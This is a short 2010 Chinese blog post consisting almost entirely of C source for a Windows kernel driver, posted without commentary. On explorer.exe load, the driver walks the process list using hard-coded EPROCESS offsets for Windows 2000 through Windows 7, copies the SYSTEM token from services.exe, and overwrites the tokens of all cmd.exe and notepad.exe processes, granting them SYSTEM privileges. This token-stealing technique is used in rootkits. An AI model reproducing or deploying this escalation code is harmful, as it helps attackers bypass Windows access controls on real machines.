zwee

  博客园 :: 首页 :: 博问 :: 闪存 :: 新随笔 :: 联系 :: 订阅 订阅 :: 管理 ::
  1 随笔 :: 0 文章 :: 0 评论 :: 0 引用

公告

test

代码
1 #include "ntddk.h"
2 #include "ntdddisk.h"
3 #include "windef.h"
4  #define SbNotifyDriverLoad 0
5 #define SbInstallWindowsHook 2
6 #define HookType_Hook 0
7 #define HookType_Intercept 1
8 struct
9 {
10 void * FunctionName;
11 void * FunctionHook;
12 int i;
13 unsigned Type;
14 } Hook;
15 void PrivilegeEscalation(IN PVOID StartContext);
16 void NotifyRoutine(IN PUNICODE_STRING FullImageName, IN HANDLE ProcessId, IN PIMAGE_INFO ImageInfo);
17 NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING theRegistryPath )
18 {
19 HANDLE ThreadHandle;
20 OBJECT_ATTRIBUTES ObjectAttributes;
21 DbgPrint("\nhere we go!\n\n");
22 InitializeObjectAttributes(&ObjectAttributes, NULL, OBJ_KERNEL_HANDLE, NULL, NULL);
23 PsSetLoadImageNotifyRoutine(&NotifyRoutine);
24
25 return STATUS_SUCCESS;
26 }
27 void NotifyRoutine(IN PUNICODE_STRING FullImageName, IN HANDLE ProcessId, IN PIMAGE_INFO ImageInfo)
28 {
29 DbgPrint("Image Load: %wZ\n", FullImageName);
30
31 if(_wcsnicmp(FullImageName->Buffer, L"\\Device\\HarddiskVolume1\\Windows\\explorer.exe", 51) == 0 )
32 PrivilegeEscalation(NULL);
33 }
34 void PrivilegeEscalation(IN PVOID StartContext)
35 {
36 PEPROCESS CurrentProcess, ServiceProcess, FirstProcess;
37 DWORD ServiceSecurityToken;
38 RTL_OSVERSIONINFOW OSVersionInfo;
39 DWORD OffsetAPL, OffsetIN, OffsetST;
40 CurrentProcess = IoGetCurrentProcess();
41 OSVersionInfo.dwOSVersionInfoSize = sizeof(RTL_OSVERSIONINFOW);
42 PsGetVersion(&OSVersionInfo.dwMajorVersion, &OSVersionInfo.dwMinorVersion, NULL, NULL);
43 if (!(OSVersionInfo.dwMajorVersion == 5 && OSVersionInfo.dwMinorVersion == 0)) // RtlGetVersion() is only support on XP and higher
44 RtlGetVersion(&OSVersionInfo);
45 if (OSVersionInfo.dwMajorVersion == 5 && OSVersionInfo.dwMinorVersion == 0) // Windows 2000
46 { OffsetAPL = 0xA0; OffsetIN = 0x15C; OffsetST = 0x8C; }
47 else if (OSVersionInfo.dwMajorVersion == 5 && OSVersionInfo.dwMinorVersion == 1) // Windows XP
48 { OffsetAPL = 0x88; OffsetIN = 0xEC; OffsetST = 0x40; }
49 else if (OSVersionInfo.dwMajorVersion == 5 && OSVersionInfo.dwMinorVersion == 2) // Windows Server 2003
50 { OffsetAPL = 0x88; OffsetIN = 0xCC; OffsetST = 0x40;
51 if (OSVersionInfo.dwBuildNumber == 3790) OffsetAPL += 0x10; } // Windows Server 2003 R2
52 else if (OSVersionInfo.dwMajorVersion == 6 && OSVersionInfo.dwMinorVersion == 0) // Windows Vista, Windows Server 2008
53 { OffsetAPL = 0xA0; OffsetIN = 0xAC; OffsetST = 0x40; }
54 else if (OSVersionInfo.dwMajorVersion == 6 && OSVersionInfo.dwMinorVersion == 1) // Windows 7 RC
55 { OffsetAPL = 0xB8; OffsetIN = 0xB4; OffsetST = 0x40;
56 if (OSVersionInfo.dwBuildNumber == 7000) OffsetIN = 0xAC; } // Windows 7 Beta
57 else
58 {
59 DbgPrint("this is only supported on win 7\n");
60 return;
61 }
62 // find services.exe process structure
63 ServiceProcess = *(PEPROCESS *)((BYTE *)CurrentProcess + OffsetAPL);
64 ServiceProcess = *(PEPROCESS *)(ServiceProcess);
65 while (1)
66 {
67 DbgPrint("Found Process: %s\n", (char *)ServiceProcess + OffsetIN);
68 if (_stricmp((char *)ServiceProcess + OffsetIN, "services.exe") == 0)
69 break;
70 ServiceProcess = *(PEPROCESS *)(ServiceProcess);
71 }
72
73 ServiceSecurityToken = *(DWORD *)((DWORD *)ServiceProcess + OffsetST/4);
74 DbgPrint("System Service Security Token: %08x\n", ServiceSecurityToken);
75 // now escalate any cmd.exe, notepad.exe, King Kleissner process
76 CurrentProcess = *(PEPROCESS *)((BYTE *)CurrentProcess + OffsetAPL);
77 for (FirstProcess = CurrentProcess; FirstProcess != *(PEPROCESS *)(CurrentProcess); CurrentProcess = *(PEPROCESS *)(CurrentProcess))
78 {
79 if ( _stricmp((char *)CurrentProcess + OffsetIN, "cmd.exe") == 0 ||
80 _stricmp((char *)CurrentProcess + OffsetIN, "notepad.exe") == 0 )
81 {
82 DbgPrint("Overwriting old Security Token: %08x\n", *(DWORD *)((DWORD *)CurrentProcess + OffsetST/4));
83 ObReferenceObject((void *)ServiceSecurityToken);
84 *(DWORD *)((DWORD *)CurrentProcess + OffsetST/4) = ServiceSecurityToken;
85 DbgPrint("cmd.exe privilege escalated successfully!\n");
86 }
87 }
88 }

 

posted on 2010-11-19 18:11 zwee 阅读(...) 评论(...) 编辑 收藏